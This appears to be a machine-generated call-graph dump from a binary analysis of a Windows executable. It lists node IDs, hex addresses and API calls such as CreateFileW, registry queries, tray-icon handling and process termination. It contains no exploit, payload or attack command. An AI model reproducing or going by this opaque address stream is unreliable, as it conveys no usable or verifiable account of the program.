93122->93168 93125 3b0a4b 93126 3b0a6b 93125->93126 93127 3b0a54 93125->93127 93181 3b073a CreateFileW 93126->93181 93184 39f656 20 API calls _free 93127->93184 93131 3b0a59 93185 39f669 20 API calls _free 93131->93185 93133 3b0b21 GetFileType 93135 3b0b2c GetLastError 93133->93135 93140 3b0b73 93133->93140 93134 3b0af6 GetLastError 93187 39f633 20 API calls 2 library calls 93134->93187 93188 39f633 20 API calls 2 library calls 93135->93188 93137 3b0aa4 93137->93133 93137->93134 93186 3b073a CreateFileW 93137->93186 93139 3b0b3a CloseHandle 93142 3b0a32 93139->93142 93143 3b0b63 93139->93143 93190 3a54fa 21 API calls 3 library calls 93140->93190 93183 39f669 20 API calls _free 93142->93183 93189 39f669 20 API calls _free 93143->93189 93145 3b0ae9 93145->93133 93145->93134 93147 3b0b94 93149 3b0be0 93147->93149 93191 3b094b 72 API calls 4 library calls 93147->93191 93148 3b0b68 93148->93142 93154 3b0c0d 93149->93154 93192 3b04ed 72 API calls 3 library calls 93149->93192 93152 3b0c06 93153 3b0c1e 93152->93153 93152->93154 93156 3b0498 93153->93156 93157 3b0c9c CloseHandle 93153->93157 93193 3a8a3e 93154->93193 93167 3b04c1 LeaveCriticalSection __wsopen_s 93156->93167 93208 3b073a CreateFileW 93157->93208 93159 3b0cc7 93160 3b0cfd 93159->93160 93161 3b0cd1 GetLastError 93159->93161 93160->93156 93209 39f633 20 API calls 2 library calls 93161->93209 93163 3b0cdd 93210 3a56c3 21 API calls 3 library calls 93163->93210 93165->93112 93166->93118 93167->93118 93169 3a55bd ___DestructExceptionObject 93168->93169 93211 3a32ee EnterCriticalSection 93169->93211 93171 3a55e9 93215 3a5390 93171->93215 93174 3a5634 __wsopen_s 93174->93125 93175 3a55c4 93175->93171 93177 3a5657 EnterCriticalSection 93175->93177 93179 3a560b 93175->93179 93178 3a5664 LeaveCriticalSection 93177->93178 93177->93179 93178->93175 93212 3a56ba 93179->93212 93181->93137 93182->93142 93183->93156 93184->93131 93185->93142 93186->93145 93187->93142 93188->93139 93189->93148 93190->93147 93191->93149 93192->93152 93241 3a5754 93193->93241 93195 3a8a54 93254 3a56c3 21 API calls 3 library calls 93195->93254 93197 3a8a4e 93197->93195 93198 3a5754 __wsopen_s 26 API calls 93197->93198 93207 3a8a86 93197->93207 93203 3a8a7d 93198->93203 93199 3a5754 __wsopen_s 26 API calls 93200 3a8a92 CloseHandle 93199->93200 93200->93195 93204 3a8a9e GetLastError 93200->93204 93201 3a8aac 93202 3a8ace 93201->93202 93255 39f633 20 API calls 2 library calls 93201->93255 93202->93156 93206 3a5754 __wsopen_s 26 API calls 93203->93206 93204->93195 93206->93207 93207->93195 93207->93199 93208->93159 93209->93163 93210->93160 93211->93175 93223 3a3336 LeaveCriticalSection 93212->93223 93214 3a56c1 93214->93174 93224 3a500d 93215->93224 93217 3a53af 93232 3a2d58 93217->93232 93218 3a53a2 93218->93217 93231 3a3795 11 API calls 2 library calls 93218->93231 93221 3a5401 93221->93179 93222 3a54d7 EnterCriticalSection 93221->93222 93222->93179 93223->93214 93229 3a501a CallUnexpected 93224->93229 93225 3a505a 93239 39f669 20 API calls _free 93225->93239 93226 3a5045 RtlAllocateHeap 93228 3a5058 93226->93228 93226->93229 93228->93218 93229->93225 93229->93226 93238 39523d 7 API calls 2 library calls 93229->93238 93231->93218 93233 3a2d63 RtlFreeHeap 93232->93233 93237 3a2d8c _free 93232->93237 93234 3a2d78 93233->93234 93233->93237 93240 39f669 20 API calls _free 93234->93240 93236 3a2d7e GetLastError 93236->93237 93237->93221 93238->93229 93239->93228 93240->93236 93242 3a5761 93241->93242 93243 3a5776 93241->93243 93256 39f656 20 API calls _free 93242->93256 93249 3a579b 93243->93249 93258 39f656 20 API calls _free 93243->93258 93246 3a5766 93257 39f669 20 API calls _free 93246->93257 93247 3a57a6 93259 39f669 20 API calls _free 93247->93259 93249->93197 93251 3a576e 93251->93197 93252 3a57ae 93260 3a2b7c 26 API calls __cftof 93252->93260 93254->93201 93255->93202 93256->93246 93257->93251 93258->93247 93259->93252 93260->93251 93261 3c55f4 93270 38e34f 93261->93270 93263 3c560a 93265 3c5685 93263->93265 93279 38a9e5 9 API calls 93263->93279 93268 3c617b 93265->93268 93281 3e3ef6 81 API calls __wsopen_s 93265->93281 93267 3c5665 93267->93265 93280 3e2393 8 API calls 93267->93280 93271 38e35d 93270->93271 93272 38e370 93270->93272 93273 37b3fe 8 API calls 93271->93273 93274 38e3a3 93272->93274 93275 38e375 93272->93275 93278 38e367 93273->93278 93277 37b3fe 8 API calls 93274->93277 93276 39016b 8 API calls 93275->93276 93276->93278 93277->93278 93278->93263 93279->93267 93280->93265 93281->93268 93282 37367c 93285 373696 93282->93285 93286 3736ad 93285->93286 93287 3736b2 93286->93287 93288 373711 93286->93288 93326 37370f 93286->93326 93292 3736bf 93287->93292 93293 37378b PostQuitMessage 93287->93293 93290 373717 93288->93290 93291 3b3dce 93288->93291 93289 3736f6 DefWindowProcW 93315 373690 93289->93315 93295 373743 SetTimer RegisterWindowMessageW 93290->93295 93296 37371e 93290->93296 93341 372f24 10 API calls 93291->93341 93297 3b3e3b 93292->93297 93298 3736ca 93292->93298 93293->93315 93303 37376c CreatePopupMenu 93295->93303 93295->93315 93301 373727 KillTimer 93296->93301 93302 3b3d6f 93296->93302 93346 3dc80c 65 API calls ___scrt_fastfail 93297->93346 93304 373795 93298->93304 93305 3736d4 93298->93305 93300 3b3def 93342 38f1c6 40 API calls 93300->93342 93337 37388e Shell_NotifyIconW ___scrt_fastfail 93301->93337 93310 3b3daa MoveWindow 93302->93310 93311 3b3d74 93302->93311 93303->93315 93330 38fcbb 93304->93330 93306 3736df 93305->93306 93319 3b3e20 93305->93319 93313 3736ea 93306->93313 93314 373779 93306->93314 93307 3b3e4d 93307->93289 93307->93315 93310->93315 93316 3b3d7a 93311->93316 93317 3b3d99 SetFocus 93311->93317 93313->93289 93343 37388e Shell_NotifyIconW ___scrt_fastfail 93313->93343 93339 3737a6 75 API calls ___scrt_fastfail 93314->93339 93316->93313 93321 3b3d83 93316->93321 93317->93315 93318 37373a 93338 37572c DeleteObject DestroyWindow 93318->93338 93319->93289 93345 3d1367 8 API calls 93319->93345 93340 372f24 10 API calls 93321->93340 93324 373789 93324->93315 93326->93289 93328 3b3e14 93344 3738f2 60 API calls ___scrt_fastfail 93328->93344 93331 38fd59 93330->93331 93332 38fcd3 ___scrt_fastfail 93330->93332 93331->93315 93347 375f59 93332->93347 93334 38fd42 KillTimer SetTimer 93334->93331 93335 38fcfa 93335->93334 93336 3cfdcb Shell_NotifyIconW 93335->93336 93336->93334 93337->93318 93338->93315 93339->93324 93340->93315 93341->93300 93342->93313 93343->93328 93344->93326 93345->93326 93346->93307 93348 375f76 93347->93348 93349 376058 93347->93349 93350 377a14 8 API calls 93348->93350 93349->93335 93351 375f84 93350->93351 93352 375f91 93351->93352 93353 3b5101 LoadStringW 93351->93353 93354 3784b7 8 API calls 93352->93354 93356 3b511b 93353->93356 93355 375fa6 93354->93355 93357 375fb3 93355->93357 93364 3b5137 93355->93364 93359 37be6d 8 API calls 93356->93359 93362 375fd9 ___scrt_fastfail 93356->93362 93357->93356 93358 375fbd 93357->93358 93360 3765a4 8 API calls 93358->93360 93359->93362 93361 375fcb 93360->93361 93363 377af4 8 API calls 93361->93363 93366 37603e Shell_NotifyIconW 93362->93366 93363->93362 93364->93362 93365 3b517a 93364->93365 93367 37bf07 8 API calls 93364->93367 93378 38fe8f 51 API calls 93365->93378 93366->93349 93368 3b5161 93367->93368 93377 3da265 9 API calls 93368->93377 93371 3b5199 93373 3765a4 8 API calls 93371->93373 93372 3b516c 93374 377af4 8 API calls 93372->93374 93375 3b51aa 93373->93375 93374->93365 93376 3765a4 8 API calls 93375->93376 93376->93362 93377->93372 93378->93371 93379 37105b 93384 37522e 93379->93384 93381 37106a 93415 390433 29 API calls __onexit 93381->93415 93383 371074 93385 37523e __wsopen_s 93384->93385 93386 37bf07 8 API calls 93385->93386 93387 3752f4 93386->93387 93416 37551b 93387->93416 93389 3752fd 93423 3751bf 93389->93423 93392 3765a4 8 API calls 93393 375316 93392->93393 93429 37684e 93393->93429 93396 37bf07 8 API calls 93397 37532e 93396->93397 93398 37bceb 8 API calls 93397->93398 93399 375337 RegOpenKeyExW 93398->93399 93400 3b4bc0 RegQueryValueExW 93399->93400 93404 375359 93399->93404 93401 3b4bdd 93400->93401 93402 3b4c56 RegCloseKey 93400->93402 93403 39019b 8 API calls 93401->93403 93402->93404 93414 3b4c68 _wcslen 93402->93414 93405 3b4bf6 93403->93405 93404->93381 93406 3741a6 8 API calls 93405->93406 93407 3b4c01 RegQueryValueExW 93406->93407 93408 3b4c1e 93407->93408 93411 3b4c38 messages 93407->93411 93409 3784b7 8 API calls 93408->93409 93409->93411 93410 37627c 8 API calls 93410->93414 93411->93402 93412 37b25f 8 API calls 93412->93414 93413 37684e 8 API calls 93413->93414 93414->93404 93414->93410 93414->93412 93414->93413 93415->93383 93417 3b22f0 __wsopen_s 93416->93417 93418 375528 GetModuleFileNameW 93417->93418 93419 37b25f 8 API calls 93418->93419 93420 37554e 93419->93420 93421 37557e 9 API calls 93420->93421 93422 375558 93421->93422 93422->93389 93424 3b22f0 __wsopen_s 93423->93424 93425 3751cc GetFullPathNameW 93424->93425 93426 3751ee 93425->93426 93427 3784b7 8 API calls 93426->93427 93428 37520c 93427->93428 93428->93392 93430 37685d 93429->93430 93434 37687e __fread_nolock 93429->93434 93432 39019b 8 API calls 93430->93432 93431 39016b 8 API calls 93433 375325 93431->93433 93432->93434 93433->93396 93434->93431 93435 371098 93440 375d78 93435->93440 93439 3710a7 93441 37bf07 8 API calls 93440->93441 93442 375d8f GetVersionExW 93441->93442 93443 3784b7 8 API calls 93442->93443 93444 375ddc 93443->93444 93445 3796d9 8 API calls 93444->93445 93447 375e12 93444->93447 93446 375e06 93445->93446 93449 3779ed 8 API calls 93446->93449 93448 375ecc GetCurrentProcess IsWow64Process 93447->93448 93455 3b50ad 93447->93455 93450 375ee8 93448->93450 93449->93447 93451 375f00 LoadLibraryA 93450->93451 93452 3b50f2 GetSystemInfo 93450->93452 93453 375f11 GetProcAddress 93451->93453 93454 375f4d GetSystemInfo 93451->93454 93453->93454 93456 375f21 GetNativeSystemInfo 93453->93456 93457 375f27 93454->93457 93456->93457 93458 37109d 93457->93458 93459 375f2b FreeLibrary 93457->93459 93460 390433 29 API calls __onexit 93458->93460 93459->93458 93460->93439 93461 3c506e 93473 37f7b0 messages 93461->93473 93462 3e3ef6 81 API calls 93462->93473 93464 381c50 8 API calls 93464->93473 93466 37bf07 8 API calls 93466->93473 93468 37be6d 8 API calls 93468->93473 93471 37fa91 93472 3802f0 254 API calls 93472->93473 93473->93462 93473->93464 93473->93466 93473->93468 93473->93471 93473->93472 93476 37bdc1 93473->93476 93480 38b2d6 254 API calls 93473->93480 93481 3905d2 5 API calls __Init_thread_wait 93473->93481 93482 390433 29 API calls __onexit 93473->93482 93483 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93473->93483 93484 3f5131 101 API calls 93473->93484 93485 3f721e 254 API calls 93473->93485 93477 37bdcc 93476->93477 93478 37bdfb 93477->93478 93486 37bf39 93477->93486 93478->93473 93480->93473 93481->93473 93482->93473 93483->93473 93484->93473 93485->93473 93503 37cf30 93486->93503 93488 37bf49 93489 37bf57 93488->93489 93490 3c0d59 93488->93490 93492 39016b 8 API calls 93489->93492 93491 37b3fe 8 API calls 93490->93491 93493 3c0d64 93491->93493 93494 37bf68 93492->93494 93495 37bf07 8 API calls 93494->93495 93496 37bf72 93495->93496 93497 37bf81 93496->93497 93498 37be6d 8 API calls 93496->93498 93499 39016b 8 API calls 93497->93499 93498->93497 93500 37bf8b 93499->93500 93511 37be0f 39 API calls 93500->93511 93502 37bfaf 93502->93478 93504 37d177 93503->93504 93509 37cf43 93503->93509 93504->93488 93506 37cfed 93506->93488 93507 37bf07 8 API calls 93507->93509 93509->93506 93509->93507 93512 3905d2 5 API calls __Init_thread_wait 93509->93512 93513 390433 29 API calls __onexit 93509->93513 93514 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93509->93514 93511->93502 93512->93509 93513->93509 93514->93509 93515 3c3bae 93536 3dc72e 93515->93536 93517 3c3bb8 93519 3c3be3 93517->93519 93520 3dc72e Sleep 93517->93520 93525 37ef8b 93517->93525 93542 38a9e5 9 API calls 93517->93542 93521 37b25f 8 API calls 93519->93521 93520->93517 93522 3c3c13 93521->93522 93523 37bf39 39 API calls 93522->93523 93524 3c3c2f 93523->93524 93543 3e4384 8 API calls 93524->93543 93529 37f400 93525->93529 93528 37f047 93530 37f433 93529->93530 93531 37f41f 93529->93531 93576 3e3ef6 81 API calls __wsopen_s 93530->93576 93544 37e910 93531->93544 93534 37f42a 93534->93528 93535 3c4528 93535->93535 93537 3dc739 93536->93537 93538 3dc754 93536->93538 93537->93517 93539 3dc782 93538->93539 93540 3dc766 Sleep 93538->93540 93539->93517 93540->93539 93542->93517 93543->93528 93545 3802f0 254 API calls 93544->93545 93556 37e94d 93545->93556 93546 3c3176 93583 3e3ef6 81 API calls __wsopen_s 93546->93583 93548 37e9bb messages 93548->93534 93549 37ed85 93549->93548 93558 39019b 8 API calls 93549->93558 93550 37ea73 93550->93549 93552 37ea7e 93550->93552 93551 37ecaf 93554 37ecc4 93551->93554 93555 3c3167 93551->93555 93553 39016b 8 API calls 93552->93553 93566 37ea85 __fread_nolock 93553->93566 93559 39016b 8 API calls 93554->93559 93582 3f6062 8 API calls 93555->93582 93556->93546 93556->93548 93556->93549 93556->93550 93557 37eb68 93556->93557 93564 39016b 8 API calls 93556->93564 93571 37ead9 __fread_nolock messages 93556->93571 93561 39019b 8 API calls 93557->93561 93558->93566 93568 37eb1a 93559->93568 93561->93571 93562 39016b 8 API calls 93563 37eaa6 93562->93563 93563->93571 93577 37d210 254 API calls 93563->93577 93564->93556 93566->93562 93566->93563 93567 3c3156 93581 3e3ef6 81 API calls __wsopen_s 93567->93581 93568->93534 93571->93551 93571->93567 93571->93568 93572 3c3131 93571->93572 93574 3c310f 93571->93574 93578 374485 254 API calls 93571->93578 93580 3e3ef6 81 API calls __wsopen_s 93572->93580 93579 3e3ef6 81 API calls __wsopen_s 93574->93579 93576->93535 93577->93571 93578->93571 93579->93568 93580->93568 93581->93568 93582->93546 93583->93548 93584 39078b 93585 390797 ___DestructExceptionObject 93584->93585 93614 390241 93585->93614 93587 39079e 93588 3908f1 93587->93588 93591 3907c8 93587->93591 93655 390bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 93588->93655 93590 3908f8 93648 3951e2 93590->93648 93600 390807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93591->93600 93625 3a280d 93591->93625 93598 3907e7 93605 390868 93600->93605 93651 3951aa 38 API calls 3 library calls 93600->93651 93602 39086e 93637 3732a2 93602->93637 93633 390ce9 93605->93633 93608 39088a 93608->93590 93609 39088e 93608->93609 93610 390897 93609->93610 93653 395185 28 API calls _abort 93609->93653 93654 3903d0 13 API calls 2 library calls 93610->93654 93613 39089f 93613->93598 93615 39024a 93614->93615 93657 390a28 IsProcessorFeaturePresent 93615->93657 93617 390256 93658 393024 10 API calls 3 library calls 93617->93658 93619 39025b 93624 39025f 93619->93624 93659 3a26a7 93619->93659 93622 390276 93622->93587 93624->93587 93626 3a2824 93625->93626 93627 390e1c _ValidateLocalCookies 5 API calls 93626->93627 93628 3907e1 93627->93628 93628->93598 93629 3a27b1 93628->93629 93631 3a27e0 93629->93631 93630 390e1c _ValidateLocalCookies 5 API calls 93632 3a2809 93630->93632 93631->93630 93632->93600 93710 3926d0 93633->93710 93636 390d0f 93636->93602 93638 3732ae IsThemeActive 93637->93638 93639 373309 93637->93639 93712 3952d3 93638->93712 93652 390d22 GetModuleHandleW 93639->93652 93641 3732d9 93718 395339 93641->93718 93643 3732e0 93725 37326d SystemParametersInfoW SystemParametersInfoW 93643->93725 93645 3732e7 93726 373312 93645->93726 94590 394f5f 93648->94590 93651->93605 93652->93608 93653->93610 93654->93613 93655->93590 93657->93617 93658->93619 93663 3ad596 93659->93663 93662 39304d 8 API calls 3 library calls 93662->93624 93666 3ad5b3 93663->93666 93667 3ad5af 93663->93667 93665 390268 93665->93622 93665->93662 93666->93667 93669 3a4f8b 93666->93669 93681 390e1c 93667->93681 93670 3a4f97 ___DestructExceptionObject 93669->93670 93688 3a32ee EnterCriticalSection 93670->93688 93672 3a4f9e 93689 3a543f 93672->93689 93674 3a4fad 93675 3a4fbc 93674->93675 93702 3a4e1f 29 API calls 93674->93702 93704 3a4fd8 LeaveCriticalSection _abort 93675->93704 93678 3a4fb7 93703 3a4ed5 GetStdHandle GetFileType 93678->93703 93679 3a4fcd __wsopen_s 93679->93666 93682 390e25 93681->93682 93683 390e27 IsProcessorFeaturePresent 93681->93683 93682->93665 93685 390fee 93683->93685 93709 390fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93685->93709 93687 3910d1 93687->93665 93688->93672 93690 3a544b ___DestructExceptionObject 93689->93690 93691 3a5458 93690->93691 93692 3a546f 93690->93692 93706 39f669 20 API calls _free 93691->93706 93705 3a32ee EnterCriticalSection 93692->93705 93695 3a545d 93707 3a2b7c 26 API calls __cftof 93695->93707 93697 3a5467 __wsopen_s 93697->93674 93698 3a54a7 93708 3a54ce LeaveCriticalSection _abort 93698->93708 93700 3a5390 __wsopen_s 21 API calls 93701 3a547b 93700->93701 93701->93698 93701->93700 93702->93678 93703->93675 93704->93679 93705->93701 93706->93695 93707->93697 93708->93697 93709->93687 93711 390cfc GetStartupInfoW 93710->93711 93711->93636 93713 3952df ___DestructExceptionObject 93712->93713 93775 3a32ee EnterCriticalSection 93713->93775 93715 3952ea pre_c_initialization 93776 39532a 93715->93776 93717 39531f __wsopen_s 93717->93641 93719 39535f 93718->93719 93720 395345 93718->93720 93719->93643 93720->93719 93780 39f669 20 API calls _free 93720->93780 93722 39534f 93781 3a2b7c 26 API calls __cftof 93722->93781 93724 39535a 93724->93643 93725->93645 93727 373322 __wsopen_s 93726->93727 93728 37bf07 8 API calls 93727->93728 93729 37332e GetCurrentDirectoryW 93728->93729 93782 374f60 93729->93782 93775->93715 93779 3a3336 LeaveCriticalSection 93776->93779 93778 395331 93778->93717 93779->93778 93780->93722 93781->93724 93783 37bf07 8 API calls 93782->93783 93784 374f76 93783->93784 93897 3760f5 93784->93897 93786 374f94 93787 37bceb 8 API calls 93786->93787 93788 374fa8 93787->93788 93789 37be6d 8 API calls 93788->93789 93790 374fb3 93789->93790 93911 3788e8 93790->93911 93793 37b25f 8 API calls 93794 374fcc 93793->93794 93795 37bdc1 39 API calls 93794->93795 93796 374fdc 93795->93796 93797 37b25f 8 API calls 93796->93797 93798 375002 93797->93798 93799 37bdc1 39 API calls 93798->93799 93800 375011 93799->93800 93801 37bf07 8 API calls 93800->93801 93802 37502f 93801->93802 93914 375151 93802->93914 93805 394db8 40 API calls 93806 375049 93805->93806 93807 375053 93806->93807 93808 3b4afd 93806->93808 93810 394db8 40 API calls 93807->93810 93809 375151 8 API calls 93808->93809 93898 376102 __wsopen_s 93897->93898 93899 3784b7 8 API calls 93898->93899 93900 376134 93898->93900 93899->93900 93901 37627c 8 API calls 93900->93901 93907 37616a 93900->93907 93901->93900 93902 37627c 8 API calls 93902->93907 93903 37b25f 8 API calls 93904 376261 93903->93904 93906 37684e 8 API calls 93904->93906 93905 37b25f 8 API calls 93905->93907 93908 37626d 93906->93908 93907->93902 93907->93905 93909 37684e 8 API calls 93907->93909 93910 376238 93907->93910 93908->93786 93909->93907 93910->93903 93910->93908 93912 39016b 8 API calls 93911->93912 93913 374fbf 93912->93913 93913->93793 93915 375179 93914->93915 93916 37515b 93914->93916 93917 3784b7 8 API calls 93915->93917 93918 37be6d 8 API calls 93916->93918 93919 37503b 93916->93919 93917->93919 93918->93919 93919->93805 94591 394f6b CallUnexpected 94590->94591 94592 394f72 94591->94592 94593 394f84 94591->94593 94629 3950b9 GetModuleHandleW 94592->94629 94614 3a32ee EnterCriticalSection 94593->94614 94596 394f77 94596->94593 94630 3950fd GetModuleHandleExW 94596->94630 94597 395029 94618 395069 94597->94618 94600 395000 94605 395018 94600->94605 94609 3a27b1 _abort 5 API calls 94600->94609 94603 395072 94638 3b20c9 5 API calls _ValidateLocalCookies 94603->94638 94604 395046 94621 395078 94604->94621 94610 3a27b1 _abort 5 API calls 94605->94610 94609->94605 94610->94597 94611 394f8b 94611->94597 94611->94600 94615 3a2538 94611->94615 94614->94611 94639 3a2271 94615->94639 94658 3a3336 LeaveCriticalSection 94618->94658 94620 395042 94620->94603 94620->94604 94659 3a399c 94621->94659 94624 3950a6 94627 3950fd _abort 8 API calls 94624->94627 94625 395086 GetPEB 94625->94624 94626 395096 GetCurrentProcess TerminateProcess 94625->94626 94626->94624 94628 3950ae ExitProcess 94627->94628 94629->94596 94631 39514a 94630->94631 94632 395127 GetProcAddress 94630->94632 94634 395159 94631->94634 94635 395150 FreeLibrary 94631->94635 94633 39513c 94632->94633 94633->94631 94636 390e1c _ValidateLocalCookies 5 API calls 94634->94636 94635->94634 94637 394f83 94636->94637 94637->94593 94642 3a2220 94639->94642 94641 3a2295 94641->94600 94643 3a222c ___DestructExceptionObject 94642->94643 94650 3a32ee EnterCriticalSection 94643->94650 94645 3a223a 94651 3a22c1 94645->94651 94649 3a2258 __wsopen_s 94649->94641 94650->94645 94654 3a22e9 94651->94654 94655 3a22e1 94651->94655 94652 390e1c _ValidateLocalCookies 5 API calls 94653 3a2247 94652->94653 94657 3a2265 LeaveCriticalSection _abort 94653->94657 94654->94655 94656 3a2d58 _free 20 API calls 94654->94656 94655->94652 94656->94655 94657->94649 94658->94620 94660 3a39c1 94659->94660 94661 3a39b7 94659->94661 94666 3a3367 5 API calls 2 library calls 94660->94666 94663 390e1c _ValidateLocalCookies 5 API calls 94661->94663 94664 395082 94663->94664 94664->94624 94664->94625 94665 3a39d8 94665->94661 94666->94665 94667 371044 94672 372735 94667->94672 94669 37104a 94708 390433 29 API calls __onexit 94669->94708 94671 371054 94709 3729da 94672->94709 94676 3727ac 94677 37bf07 8 API calls 94676->94677 94678 3727b6 94677->94678 94679 37bf07 8 API calls 94678->94679 94680 3727c0 94679->94680 94681 37bf07 8 API calls 94680->94681 94682 3727ca 94681->94682 94683 37bf07 8 API calls 94682->94683 94684 372808 94683->94684 94685 37bf07 8 API calls 94684->94685 94686 3728d4 94685->94686 94719 372d5e 94686->94719 94690 372906 94691 37bf07 8 API calls 94690->94691 94692 372910 94691->94692 94693 3830e0 9 API calls 94692->94693 94694 37293b 94693->94694 94740 3730ed 94694->94740 94696 372957 94697 372967 GetStdHandle 94696->94697 94698 3b39c1 94697->94698 94699 3729bc 94697->94699 94698->94699 94700 3b39ca 94698->94700 94703 3729c9 OleInitialize 94699->94703 94701 39016b 8 API calls 94700->94701 94702 3b39d1 94701->94702 94747 3e09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 94702->94747 94703->94669 94705 3b39da 94748 3e1200 CreateThread 94705->94748 94707 3b39e6 CloseHandle 94707->94699 94708->94671 94749 372a33 94709->94749 94712 372a33 8 API calls 94713 372a12 94712->94713 94714 37bf07 8 API calls 94713->94714 94715 372a1e 94714->94715 94716 3784b7 8 API calls 94715->94716 94717 37276b 94716->94717 94718 373205 6 API calls 94717->94718 94718->94676 94720 37bf07 8 API calls 94719->94720 94721 372d6e 94720->94721 94722 37bf07 8 API calls 94721->94722 94723 372d76 94722->94723 94724 37bf07 8 API calls 94723->94724 94725 372d91 94724->94725 94726 39016b 8 API calls 94725->94726 94727 3728de 94726->94727 94728 37318c 94727->94728 94729 37319a 94728->94729 94730 37bf07 8 API calls 94729->94730 94731 3731a5 94730->94731 94732 37bf07 8 API calls 94731->94732 94733 3731b0 94732->94733 94734 37bf07 8 API calls 94733->94734 94735 3731bb 94734->94735 94736 37bf07 8 API calls 94735->94736 94737 3731c6 94736->94737 94738 39016b 8 API calls 94737->94738 94739 3731d8 RegisterWindowMessageW 94738->94739 94739->94690 94741 3b3c69 94740->94741 94742 3730fd 94740->94742 94756 3e3b63 8 API calls 94741->94756 94744 39016b 8 API calls 94742->94744 94746 373105 94744->94746 94745 3b3c74 94746->94696 94747->94705 94748->94707 94757 3e11e6 14 API calls 94748->94757 94750 37bf07 8 API calls 94749->94750 94751 372a3e 94750->94751 94752 37bf07 8 API calls 94751->94752 94753 372a46 94752->94753 94754 37bf07 8 API calls 94753->94754 94755 372a08 94754->94755 94755->94712 94756->94745 94758 3c1a68 94759 3c1a70 94758->94759 94762 37d4e5 94758->94762 94804 3d79af 8 API calls __fread_nolock 94759->94804 94761 3c1a82 94805 3d7928 8 API calls __fread_nolock 94761->94805 94764 39016b 8 API calls 94762->94764 94766 37d539 94764->94766 94765 3c1aac 94767 3802f0 254 API calls 94765->94767 94788 37c2cd 94766->94788 94768 3c1ad3 94767->94768 94770 3c1ae7 94768->94770 94806 3f60a2 53 API calls _wcslen 94768->94806 94773 39016b 8 API calls 94781 37d61e messages 94773->94781 94774 3c1b04 94774->94762 94807 3d79af 8 API calls __fread_nolock 94774->94807 94776 37c34b 8 API calls 94786 37d95c messages 94776->94786 94777 37be6d 8 API calls 94777->94781 94778 37b3fe 8 API calls 94778->94781 94780 3c1f1c 94808 3d55d9 8 API calls messages 94780->94808 94781->94777 94781->94778 94781->94780 94783 3c1f37 94781->94783 94785 37d8c1 messages 94781->94785 94795 37c34b 94781->94795 94785->94776 94785->94786 94787 37d973 94786->94787 94803 38e284 8 API calls messages 94786->94803 94792 37c2dd 94788->94792 94789 37c2e5 94789->94773 94790 39016b 8 API calls 94790->94792 94791 37bf07 8 API calls 94791->94792 94792->94789 94792->94790 94792->94791 94793 37be6d 8 API calls 94792->94793 94794 37c2cd 8 API calls 94792->94794 94793->94792 94794->94792 94796 37c359 94795->94796 94800 37c381 messages 94795->94800 94797 37c367 94796->94797 94798 37c34b 8 API calls 94796->94798 94799 37c36d 94797->94799 94801 37c34b 8 API calls 94797->94801 94798->94797 94799->94800 94802 37c780 8 API calls 94799->94802 94800->94781 94801->94799 94802->94800 94803->94786 94804->94761 94805->94765 94806->94774 94807->94774 94808->94783 94809 380e6f 94810 380e83 94809->94810 94816 3813d5 94809->94816 94811 380e95 94810->94811 94812 39016b 8 API calls 94810->94812 94813 3c55d0 94811->94813 94814 37b3fe 8 API calls 94811->94814 94815 380eee 94811->94815 94812->94811 94843 3e1a29 8 API calls 94813->94843 94814->94811 94818 382ad0 254 API calls 94815->94818 94834 38044d messages 94815->94834 94816->94811 94819 37be6d 8 API calls 94816->94819 94841 380326 messages 94818->94841 94819->94811 94820 39016b 8 API calls 94820->94841 94821 3c62cf 94847 3e3ef6 81 API calls __wsopen_s 94821->94847 94823 381645 94827 37be6d 8 API calls 94823->94827 94823->94834 94825 3c5c7f 94831 37be6d 8 API calls 94825->94831 94825->94834 94826 3c61fe 94846 3e3ef6 81 API calls __wsopen_s 94826->94846 94827->94834 94830 381940 254 API calls 94830->94841 94831->94834 94832 37be6d 8 API calls 94832->94841 94833 37bf07 8 API calls 94833->94841 94835 390433 29 API calls pre_c_initialization 94835->94841 94836 3905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94836->94841 94837 3c60b9 94844 3e3ef6 81 API calls __wsopen_s 94837->94844 94839 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94839->94841 94840 380a5e messages 94845 3e3ef6 81 API calls __wsopen_s 94840->94845 94841->94820 94841->94821 94841->94823 94841->94825 94841->94826 94841->94830 94841->94832 94841->94833 94841->94834 94841->94835 94841->94836 94841->94837 94841->94839 94841->94840 94842 381e00 40 API calls messages 94841->94842 94842->94841 94843->94834 94844->94840 94845->94834 94846->94834 94847->94834 94848 39f08e 94849 39f09a ___DestructExceptionObject 94848->94849 94850 39f0bb 94849->94850 94851 39f0a6 94849->94851 94861 39951d EnterCriticalSection 94850->94861 94867 39f669 20 API calls _free 94851->94867 94854 39f0c7 94862 39f0fb 94854->94862 94855 39f0ab 94868 3a2b7c 26 API calls __cftof 94855->94868 94860 39f0b6 __wsopen_s 94861->94854 94870 39f126 94862->94870 94864 39f108 94865 39f0d4 94864->94865 94890 39f669 20 API calls _free 94864->94890 94869 39f0f1 LeaveCriticalSection __fread_nolock 94865->94869 94867->94855 94868->94860 94869->94860 94871 39f14e 94870->94871 94872 39f134 94870->94872 94873 39dce5 __fread_nolock 26 API calls 94871->94873 94894 39f669 20 API calls _free 94872->94894 94875 39f157 94873->94875 94891 3a9799 94875->94891 94876 39f139 94895 3a2b7c 26 API calls __cftof 94876->94895 94880 39f25b 94881 39f268 94880->94881 94889 39f20e 94880->94889 94897 39f669 20 API calls _free 94881->94897 94882 39f1df 94884 39f1fc 94882->94884 94882->94889 94896 39f43f 31 API calls 4 library calls 94884->94896 94886 39f206 94888 39f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 94886->94888 94888->94864 94889->94888 94898 39f2bb 30 API calls 2 library calls 94889->94898 94890->94865 94899 3a9616 94891->94899 94893 39f173 94893->94880 94893->94882 94893->94888 94894->94876 94895->94888 94896->94886 94897->94888 94898->94888 94900 3a9622 ___DestructExceptionObject 94899->94900 94901 3a962a 94900->94901 94904 3a9642 94900->94904 94934 39f656 20 API calls _free 94901->94934 94902 3a96f6 94939 39f656 20 API calls _free 94902->94939 94904->94902 94907 3a967a 